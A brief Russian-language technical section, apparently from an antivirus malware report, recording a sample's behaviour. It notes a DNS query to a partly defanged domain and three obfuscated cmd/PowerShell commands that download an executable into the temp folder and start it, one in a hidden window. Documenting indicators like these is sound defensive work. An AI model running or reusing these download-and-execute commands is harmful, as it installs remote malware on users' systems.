Техническая информация
- DNS ASK ko#.#izzy.us
- '<SYSTEM32>\cmd.exe' /c cmd /cPowe%ALLUSERSPROFILE:~4,1%SheLL $client = new-object System.Net.WebClient;$client.DownloadFile('http://ko#.#izzy.us/FB/FBB.exe','%temp%\kcn.exe');start %temp%\kcn.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cmd /cPowe%ALLUSERSPROFILE:~4,1%SheLL $client = new-object System.Net.WebClient;$client.DownloadFile('http://ko#.#izzy.us/FB/FBB.exe','%temp%\kcn.exe');start %temp%\kcn.exe
- '<SYSTEM32>\cmd.exe' /cPowerSheLL $client = new-object System.Net.WebClient;$client.DownloadFile('http://ko#.#izzy.us/FB/FBB.exe','%TEMP%\kcn.exe');start %TEMP%\kcn.exe